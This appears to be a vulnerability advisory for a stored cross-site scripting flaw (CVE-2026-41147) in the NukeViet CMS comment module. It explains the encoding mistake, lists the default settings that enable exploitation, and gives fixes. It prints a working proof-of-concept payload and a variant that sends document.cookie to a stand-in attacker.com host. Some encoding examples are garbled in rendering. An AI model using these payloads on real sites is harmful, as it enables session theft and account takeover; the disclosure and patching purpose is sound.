NukeViet CMS, Stored Cross-Site Scripting (XSS), CVE-2026-41147 (High) -DC-Jul2026-942

Listen to this Post

How CVE-2026-41147 Works

NukeViet CMS versions 4.x through 4.5.08 contain a stored cross-site scripting (XSS) vulnerability arising from improper output encoding in the comment module. The root cause lies in the `{COMMENT.post_name}` template variable, which is interpolated without JavaScript-context escaping into an inline `onclick` handler.
The `first_name` and `last_name` profile fields are sanitized using `Request::_get_()` with $specialchars = true, which converts characters like `’` to ', `(` to (, `)` to ), and `/` to /. While this HTML numeric character reference encoding is appropriate for HTML element content and quoted HTML attribute values, it is insufficient for a JavaScript string literal embedded within an HTML attribute.
Browsers decode HTML entities in attribute values before the JavaScript engine parses the string. Consequently, `’` is decoded back to ', which prematurely terminates the JavaScript string and allows the remainder of the value to execute as arbitrary JavaScript. The combined display name—constructed via nv_show_name_user(first_name, last_name)—reaches the template, providing an attacker with up to approximately 200 encoded characters across both fields.
Several default configuration settings facilitate exploitation. `captcha_area_comm` defaults to 1, meaning no CAPTCHA is required for logged-in users. `auto_postcomm` is enabled, so comments are published immediately without moderation. `active_editinfo_censor` defaults to 0, allowing profile edits to take effect without admin review. The Content Security Policy (CSP) includes 'unsafe-inline', permitting inline `onclick` handlers to execute normally. Any registered member can set the payload and post a comment with no additional steps. If `captcha_area_comm` is set to 0, the `name` field of anonymous comments is processed by the same `get_(…, 1)` call, making exploitation possible without authentication.
The vulnerability has been assigned a CVSS 3.1 base score of 8.7 (High) by GitHub, Inc., with the vector: AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N.

DailyCVE Form

| Field | Answer |

|-|–|

| Platform | NukeViet CMS |

| Version | 4.x through 4.5.08 |

| Vulnerability | Stored Cross-Site Scripting (XSS) |

| Severity | High (CVSS 8.7) |

| Date | May 15, 2026 |

| Prediction | Already patched (v4.5.08+) |

What Undercode Say: Analytics

Affected Component Analysis:

– `themes/default/modules/comment/comment.tpl` — line 27 (top-level comments)
– `themes/default/modules/comment/comment.tpl` — line 64 (nested/reply comments)

Vulnerable Code Pattern:

onclick="nv_commment_feedback(event, {COMMENT.cid}, '{COMMENT.post_name}')"

Sanitization Function:

Request::<em>get</em>($input, $specialchars = true)

Converts:

– `’` → `’`
– `(` → `(`
– `)` → `)`
– `/` → `/`

Exploitation Conditions (Default):

| Condition | Default Value | Effect |

|–||–|

| `captcha_area_comm` | 1 | No CAPTCHA for logged-in users |
| `auto_postcomm` | enabled | Comments published immediately |
| `active_editinfo_censor` | 0 | Profile edits take effect immediately |
| CSP `script-src` | `’unsafe-inline’` | Inline onclick handlers execute |

Exploit

Proof of Concept Payload:

Set `first_name` to the following value in profile settings (/index.php?nv=users&op=editinfo), then post any comment:

a');alert(document.domain);//

Stored Value:

a');alert(document.domain);//

Rendered Output When Victim Clicks Reply:

nv_commment_feedback(event, 1, 'a');alert(document.domain);// Tester')

Data Exfiltration Variant (split across both name fields):

// first_name: a');window.location='https://attacker.com/steal?cookie='+document.cookie;//
// last_name: ;alert('stolen');//

Navigates the victim’s browser to an attacker-controlled URL carrying `document.cookie` as a query parameter.

Anonymous Exploitation (if `captcha_area_comm = 0`):

The `name` field of anonymous comments (modules/comment/funcs/post.php) is processed by the same `get_(…, 1)` call.

Server-Side Filter Bypass:

The application relies primarily on client-side filtering, which can be bypassed by intercepting and modifying HTTP requests directly (e.g., using Burp Suite).

Protection

Preferred Fix:

Remove `post_name` from the inline handler entirely. Pass only `cid` to `nv_commment_feedback` and have the function retrieve the display name from the already-rendered DOM (e.g., the adjacent `` element).

Alternative Fix:

If the value must be passed inline, encode it with `json_encode($post_name)` (PHP) so that the output is a properly escaped JavaScript string literal. HTML numeric character references must not be relied upon for JavaScript string escaping.

Upgrade:

Upgrade to NukeViet version >= 4.5.08 or >= 4.6.00.

Workarounds:

  • Implement server-side HTML sanitization in the `Request` class to strip or encode dangerous tags and attributes (e.g., <iframe>, srcdoc, event handlers such as onerror, onload)
  • Apply a Content Security Policy (CSP) header to restrict inline script execution
  • Ensure cookies are set with the `HttpOnly` flag to mitigate cookie theft via XSS

Audit Recommendation:

Other locations in the codebase using the same pattern (get_(..., $specialchars=true) inside JavaScript string literals within HTML attributes) should be audited.

Impact

An attacker with a regular user account can execute arbitrary JavaScript in the browser of any visitor who interacts with the Reply button on their comment, including site administrators.

Practical Consequences:

| Impact | Description |

|–|-|

| Privilege Escalation | Admin session hijacking — forging administrative actions (content modification, account manipulation) in the context of an authenticated admin |
| Credential Phishing | Injecting a fake login form into the page |
| Data Exfiltration | Reading page content and non-HttpOnly cookies |
| Defacement | Modifying page content or redirecting to phishing pages |

| Phishing Attacks | Manipulated email notifications |

Note: NukeViet session cookies carry the `HttpOnly` flag, so they are not directly readable via document.cookie; however, the above attack vectors remain fully viable.

References:

  • CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
  • CWE-116: Improper Encoding or Escaping of Output
  • OWASP: Cross Site Scripting Prevention — Rule 2: Attribute Encoding is Not Sufficient for JS Contexts

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top